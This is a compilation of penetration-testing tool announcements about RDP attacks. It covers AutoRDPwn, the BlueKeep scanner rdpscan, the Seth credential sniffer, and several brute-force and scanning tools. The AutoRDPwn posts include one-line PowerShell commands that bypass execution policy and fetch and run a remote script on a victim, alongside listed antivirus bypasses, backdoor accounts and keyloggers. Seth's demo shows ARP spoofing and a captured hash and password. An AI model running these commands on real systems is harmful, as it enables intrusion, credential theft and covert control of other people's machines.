AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on-demand, using tools native to the operating system itself.Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.RequirementsPowershell 4.0 or higherChangesVersion 5.0• New logo completely redesigned from scratch• Full translation in 7 languages: es, en, fr, de, it, ru, pt• Remote execution through a reverse shell with UAC and AMSI Bypass• Partial support from Linux (more information in the user guide)• Improved remote execution (internet connection is no longer necessary on the victim)• New section available: Backdoors and persistence• New module available: Remote Keylogger• New section available: Privilege escalation• New module available: Obtain information from the operating system• New module available: Search vulnerabilities with Sherlock• New module available: Escalate privileges with PowerUp• New section available: Other Modules• New module available: Execute an external script*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between teams.When used remotely in a reverse shell, it is necessary to use the following parameters:-admin / -noadmin -> Depending on the permissions we have, we will use one or the other-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)-option -> As with the menu, we can choose how to launch the attack-shadow -> We will decide if we want to see or control the remote device-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machineLocal execution on one line:powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Example of remote execution on a line:powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and AcknowledgmentsThis framework uses the following scripts and tools:• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• RDP Wrapper of Stas’M Corp. -> https://github.com/stascorp/rdpwrap• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopherAnd many more, that do not fit here .. Thanks to all of them and their excellent work.ContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

Rdpscan – A Quick Scanner For The CVE-2019-0708 “BlueKeep” Vulnerability

This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems.This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.This tool is based entirely on the rdesktop patch from https://github.com/zerosum0x0/CVE-2019-0708.Primary useTo scan a network, run it like the following:rdpscan 192.168.1.1-192.168.1.255This produces one of 3 results for each address:SAFE – if target has determined bot be patched or at least require CredSSP/NLAVULNERABLE – if the target has been confirmed to be vulnerableUNKNOWN – if the target doesn’t respond or has some protocol failureWhen nothing exists at a target IP address, the older versions pritned the message “UNKNOWN – connection timed out". When scanning large networks, this produces an overload of too much information about systems you don’t care about. Therefore, the new version by default doesn’t produce this information unless you add -v (for verbose) on the command-line.You can increase the speed at which it scans large networks by increasing the number of workers:rdpscan –workers 10000 10.0.0.0/8However, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter.You can increase the speed even more by using this in conjunction with masscan, described in the second below.Interpreting the resultsThere are three general responses:SAFE – which means the target is probably patched or otherwise not vulnerable to the bug.VULNERABLE: which means we’ve confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected.UNKNOWN: means we can’t confirm either way, usually because the target doesn’t respond or isn’t running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we’ll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you’ll see.SAFEThere are three main reaons we think a target is safe:SAFE – Target appears patched This happens when the target doesn’t respond to the triggering request. This means it’s a Windows system that’s been patched, or a system that wasn’t vulnerable to begin with, like Windows 10 or Unix.SAFE – CredSSP/NLA required This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can’t continue past this point to exploit vulnerable systems, either, so you are likely "safe". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it’s un-patched.SAFE – not RDP This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that’s clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE/VULNERABLEThis means we’ve confirmed the system is vulnerable to the bug.VULNERABLE – got appid There is only one response when the system is vulnerable, this one.UNKNOWNThere are a zillion variations for unknownUNKNOWN – no connection – timeout This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it’s so common that when scanning large ranges of addresses, it’s usually ommited. You have to add the -v (verbose) flag in order to enable it.UNKNOWN – no connection – refused (RST) This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn’t running RDP, so refuses the connection with a TCP RST packet.UNKNOWN – RDP protocol error – receive timeout This is the third most common response, and happens when we’ve successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.UNKNOWN – no connection – connection closed This means we’ve established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happen, which we cannot distinguish: It’s running RDP, but for some reason closes the connection, possibly because it’s out-of-resources.It’s not RDP, and doesn’t like the RDP request we send it, so instad of sending us a nice error message (which would trigger SAFE – not RDP), it abruptly closes the connection.Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources.Some other reason I haven’t identified, there’s a lot of weird stuff happening when I scan the Internet.UNKNOWN – no connection – host unreachable (ICMP error) The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.UNKNOWN – no connection – network unreachable (ICMP error) There is a (transient) network error on the far end, try again later if you believe that network should be running.UNKNOWN – RDP protocol error This means some corruption happened in the RDP protocol, either because the remote side implents it wrong (not a Windows system), because it’s handling a transient network error badly, or something else.UNKNOWN – SSL protocol error Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has it’s own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it’s because the other side has a bug in SSL, or your own SSL library that you are using has a bug.Using with masscanThis rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target.The steps are:First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).Second feed the output of masscan into rdpscan, so it only has to scan targets we know are active.The simple way to run this is just to combine them on the command-line:masscan 10.0.0.0/8 -p3389 | rdpscan –file -The way I do it is in two steps:masscan 10.0.0.0/8 -p3389 > ips.txtrdpscan –file ips.txt –workers 10000 >results.txtBuildingThe difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I’ve tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.$ sudo apt install libssl-dev$ sudo yum install openssl-develOnce you’ve solved that problem, you just compile all the .c files together like this:$ gcc *.c -lssl -lcrypto -o rdpscanI’ve put a Makefile in the directory that does this, so you can likely do just:$ makeThe code is written in C, so needs a C compiler installed, such as doing the following:$ sudo apt install build-essentialCommon build errorsThis section describes the more obvious build errors.ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directoryThis means you either don’t have the OpensSSL headers installed, or they aren’t in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn’t mean you’ve got the development stuff installed. You need both the headers and libraries installed.To install these things on Debian, do:$ sudo apt install libssl-devTo fix the path issue, add a compilation flag -I/usr/local/include, or something similar.An example linker problem is the following:Undefined symbols for architecture x86_64:"_OPENSSL_init_ssl", referenced from: _tcp_tls_connect in tcp-fac73c.o"_RSA_get0_key", referenced from: _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o"_SSL_CTX_set_options", referenced from: _tcp_tls_connect in tcp-fac73c.o"_X509_get_X509_PUBKEY", referenced from: _rdssl_cert_to_rkey in ssl-d5fdf5.oI get this on macOS because there’s multiple versions of OpenSSL. I fix this by hard-coding the paths:$ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscanAccording to comments by others, the following command-line might work on macOS if you’ve used Homebrew to install things. I still get the linking errors above, though, because I’ve installed other OpenSSL components that are conflicting.gcc $(brew –prefix)/opt/openssl/lib/libssl.a $(brew –prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.cRunningThe section above gives quickstart tips for running the program. This section gives more in-depth help.To scan a single target, just pass the address of the target:./rdpscan 192.168.10.101You can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren’t supported because they are so big../rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16By default, it scans only 100 targets at a time. You can increase this number with the –workers parameter. However, no matter how high you set this parameter, in practice you’ll get a max of around 500 to 1500 workers running at once, depending upon your system../rdpscan –workers 1000 10.0.0.0/24Instead of specifying targets on the command-line, you can load them from a file instead, using the well-named –file parameter:./rdpscan –file ips.txtThe format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines ignored, any any comment lines are ignored. A comment is a line starting with the # character, or // characters.The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above.211.101.37.250 – SAFE – CredSSP/NLA required185.11.124.79 – SAFE – not RDP – SSH response seen125.121.137.42 – UNKNOWN – no connection – refused (RST)40.117.191.215 – SAFE – CredSSP/NLA required121.204.186.182 – SAFE – CredSSP/NLA required99.8.11.148 – SAFE – CredSSP/NLA required121.204.186.114 – SAFE – CredSSP/NLA required49.50.145.236 – SAFE – CredSSP/NLA required106.12.74.155 – VULNERABLE – got appid222.84.253.26 – SAFE – CredSSP/NLA required144.35.133.109 – UNKNOWN – RDP protocol error – receive timeout199.212.226.196 – UNKNOWN – RDP protocol error – receive timeout183.134.58.152 – UNKNOWN – no connection – refused (RST)83.162.246.149 – VULNERABLE – got appidYou can process this with additional unix commands like grep and cut. To get a list of just vulnerable machines:./rdpscan 10.0.0.0/8 | grep ‘VULN’ | cut -f1 -d’-‘The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams. Using bash this is done like this:./rdpscan –file myips.txt -ddd 2> diag.txt 1> results.txtDiagnostic infoAdding the -d parameter dumps diagnostic info on the connections to stderr../rdpscan 62.15.34.157 -d[+] [62.15.34.157]:3389 – connecting…[+] [62.15.34.157]:3389 – connected from [10.1.10.133]:49211[+] [62.15.34.157]:3389 – SSL connection[+] [62.15.34.157]:3389 – version = v4.8[+] [62.15.34.157]:3389 – Sending MS_T120 check packet[-] [62.15.34.157]:3389 – Max sends reached, waiting…62.15.34.157 – SAFE – Target appears patchedOn macOS/Linux, you can redirect stdout and stderr separately to different files in the usual manner:./rdpscan –file ips.txt 2> diag.txt 1> results.txtSOCKS5 and Tor lulzSo it includes SOCKS5 support:./rdpscan –file ips.txt –socks5 localhost –socks5port 9050It makes connection problems worse so you get a lot more "UNKNOWN" results.Statically link OpenSSLFor releasing the Windows and macOS binaries attached as releases to this project I statically link OpenSSL, so that it doesn’t need to be included separately, and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL’s own page seems to be out of date.Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:git clone https://github.com/openssl/opensslWindowsFor Windows, you need to first install some version of Perl. I use the one from ActiveState.Next, you’ll need a special "assembler". I use the recommended one called NASM)Next, you’ll need a compiler. I use VisualStudio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft.Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:perl Configure VC-WIN32I chose 32-bit for Windows because there’s a lot of old Windows out there, and I want to make the program as compaitble as possible with old versions.I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added the following to the CPPFLAGS -D_WIN32_WINNT=0x501, which restrict OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if your run on those older systems.Now you’ll need to make sure everything is in your path. I copied nasm.exe to the a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to setup the path variables for the compiler.At this point on the command-line, I typed:nmakeThis makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.macOSFirst of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install gcc instead.Then go int othe source directory for OpenSSL and create a makefile:perl Configure darwin64-x86_64-ccNow simply make it:make dependmakeAt this point, it’s created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it’ll catch the static ones by default.Now in rdpscan, just build the macOS makefile:make -f Makefile.macosThis will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built.This should produce a 3-megabyte exexeutable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.Download Rdpscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/mCI0mRVoYKo/rdpscan-quick-scanner-for-cve-2019-0708.html

Seth – Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).UsageRun it like this:$ ./seth.sh <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using – currently it’s only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}] [-j INJECT] -c CERTFILE -k KEYFILE target_host [target_port]RDP credential sniffer — Adrian Vollmer, SySS GmbH 2017positional arguments: target_host target host of the RDP service target_port TCP port of the target RDP service (default 3389)optional arguments: -h, –help show this help message and exit -d, –debug show debug information -f, –fake-server perform a ‘fake server’ attack -p LISTEN_PORT, –listen-port LISTEN_PORT TCP port to listen on (default 3389) -b BIND_IP, –bind-ip BIND_IP IP address to bind the fake service to (default all) -g {0,1,3,11}, –downgrade {0,1,3,11} downgrade the authentication protocol to this (default 3) -j INJECT, –inject INJECT command to execute via key press event injection -c CERTFILE, –certfile CERTFILE path to the certificate file -k KEYFILE, –keyfile KEYFILE path to the key fileFor more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-sDemoThe following ouput shows the attacker’s view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.# ./seth.sh eth1 192.168.57.{103,2,102}███████╗███████╗████████╗██╗ ██╗██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017███████║███████╗ ██║ ██║ ██║ https://www.syss.de╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝[*] Spoofing arp replies…[*] Turning on IP forwarding…[*] Set iptables rules for SYN packets…[*] Waiting for a SYN packet to the original destination…[+] Got it! Original destination is 192.168.57.102[*] Clone the x509 certificate of the original destination…[*] Adjust the iptables rule for all packets…[*] Run RDP proxy…Listening for new connectionConnection received from 192.168.57.103:50431Downgradin g authentication options from 11 to 3Enable SSLalice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000Tamper with NTLM responseTLS alert access denied, Downgrading CredSSPConnection lostConnection received from 192.168.57.103:50409Listening for new connectionEnable SSLConnection lostConnection rece ived from 192.168.57.103:50410Listening for new connectionEnable SSLHiding forged protocol request from client.\alice:ilovebobKeyboard Layout: 0x409 (English_United_States)Key press: LShiftKey press: SKey release: SKey release: LShiftKey press: EKey release: EKey press: CKey release: CKey press: RKey release: RKey press: EKey release: EKey press: TKey release: TConnection lost[*] Cleaning up…[*] Done.Requirements python3 tcpdump arpspoof arpspoof is part of dsniff openssl DisclaimerUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only.Download Seth

Link: http://feedproxy.google.com/~r/PentestTools/~3/otGqqcWw2mo/seth-perform-mitm-attack-and-extract.html

June 11, 2019 – Hack Naked News #222

    This week, a botnet that’s targeting 1.5 million RDP servers worldwide, VLC Player gets patched for two highly severe bugs, thousands of images stolen from US border hack, Troy Hunt looks to sell I Been Pwnd, and a near-ubiquitous critical Microsoft RCE bugs affect all versions of Windows! In the expert commentary, we […]
The post June 11, 2019 – Hack Naked News #222 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/XTNKRLVVb2k/

MacOS Catalina, OpenShift, & Pink Floyd – Application Security Weekly #64

    “Waiting for the worms to come.” — Pink Floyd and RDP’s CVE-2019-0708. Even the NSA warns about the population of exposed systems, A patch commands attention for mail servers, In macOS Catalina and iOS 13, Apples finds a way to find devices and not lose privacy, iOS App Transport Security has strong benefits, […]
The post MacOS Catalina, OpenShift, & Pink Floyd – Application Security Weekly #64 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/Ec-nE4cPIls/

BruteDum – Brute Force Attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC With Hydra, Medusa And Ncrack

BruteDum is a SSH, FTP, Telnet, PostgreSQL, RDP, VNC brute forcing tool with Hydra, Medusa and Ncrack. BruteDum can work with aany Linux distros if they have Python 3.Features of BruteDumSSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra (recommended)SSH, FTP, Telnet, PostgreSQL, RDP, VNC with MedusaSSH, FTP, Telnet, PostgreSQL, RDP, VNC with NcrackScan victim’s ports with NmapInstall and run on LinuxYou have to install Python 3 first:Install Python 3 on Arch Linux and its distros: sudo pacman -S python3Install Python 3 on Debian and its distros: sudo apt install python3You have to install Hydra, Medusa, Nmap and Ncrack too: On Arch Linux and its distros: sudo pacman -S nmap hydra medusa ncrack On Debian and its distros: sudo apt install nmap hydra medusa ncrack git clone https://github.com/GitHackTools/BruteDumcd BruteDumpython3 brutedum.pyScreenshotsScanning victim’s ports with NmapReady to brute force Brute force has done ContactTwitter: @SecureGFDownload BruteDum

Link: http://feedproxy.google.com/~r/PentestTools/~3/3Z-_-kI5aD8/brutedum-brute-force-attacks-ssh-ftp.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo tool can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.The tool only works if WinRM is enabled. Since Windows Server 2012 WinRM is enabled by default on all Windows server operating systems, but not on client operating systems.Note: Remote desktop is disabled by default on all Windows operating systems. User would require local administrator password or administrator privileges on the server to enable RDP on a targeted machine.ScreenshotsTargeted machine on an internal network has RDP disabled:Enabling remote desktop service on a targeted machine by pressing option 2:Successfully enabled remote desktop service on a targeted machine:How to install?- git clone https://github.com/Viralmaniar/PeekABoo.git- cd PeekABoo- python peekaboo.pyHow do I use this?Press 1: This will set the PowerShell to unrestricted mode.Press 2: It enables the Remote Desktop on the targeted machine and shows the RDP port (3389) status.Press 3: It disables the Remote Desktop on the targeted machine.Press 4: To exit from the program.My Windows machine does not have Python installed, what should I do? Download an exe from the release section of the Github along with PowerShell files available here or do it on your own using PyInstaller after reviewing the source code. Compile peekaboo.py into an executable using Pyinstaller PyInstaller is available on PyPI. You can install it through pip: pip install pyinstallerQuestions?Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniarDownload PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of “screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service.InstallationBinary installation (Recommended)Binaries are available from the Release page.# Linux (64bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip$ unzip goscan_2.3_linux_amd64.zip# Linux (32bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_386.zip$ unzip goscan_2.3_linux_386.zip# After that, place the executable in your PATH$ chmod +x goscan$ sudo mv ./goscan /usr/local/bin/goscanBuild from source$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/goscan/$ make setup$ make buildTo create a multi-platform binary, use the cross command via make:$ make crossDocker$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/$ docker-compose up –buildUsageGoScan supports all the main steps of network enumeration: Step Commands 1. Load targets Add a single target via the CLI (must be a valid CIDR): load target SINGLE Upload multiple targets from a text file or folder: load target MULTI <path-to-file> 2. Host Discovery Perform a Ping Sweep: sweep <TYPE> <TARGET>Or load results from a previous discovery:Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file> 3. Port Scanning Perform a port scan: portscan <TYPE> <TARGET>Or upload nmap results from XML files or folder: load portscan <path-to-file> 4. Service Enumeration Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET> 5. Special Scans EyeWitnessTake screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitnessEyeWitness.py needs to be in the system pathExtract (Windows) domain information from enumeration dataspecial domain <users/hosts/servers>DNSEnumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>Bruteforce DNS: special dns BRUTEFORCE <domain>Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP> Utils Show results: show <targets/hosts/ports>Automatically configure settings by loading a config file: set config_file <PATH>Change the output folder (by default ~/goscan): set output_folder <PATH>Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/…> <PATH> External IntegrationsThe Service Enumeration phase currently supports the following integrations: WHAT INTEGRATION ARP nmap DNS nmapdnsrecondnsenumhost FINGER nmapfinger-user-enum FTP nmapftp-user-enumhydra [AGGRESSIVE] HTTP nmapniktodirbEyeWitnesssqlmap [AGGRESSIVE]fimap [AGGRESSIVE] RDP nmapEyeWitness SMB nmapenum4linuxnbtscansamrdump SMTP nmapsmtp-user-enum SNMP nmapsnmpcheckonesixtyonesnmpwalk SSH hydra [AGGRESSIVE] SQL nmap VNC EyeWitness Download Goscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/QvZdo-L3mC8/goscan-interactive-network-scanner.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html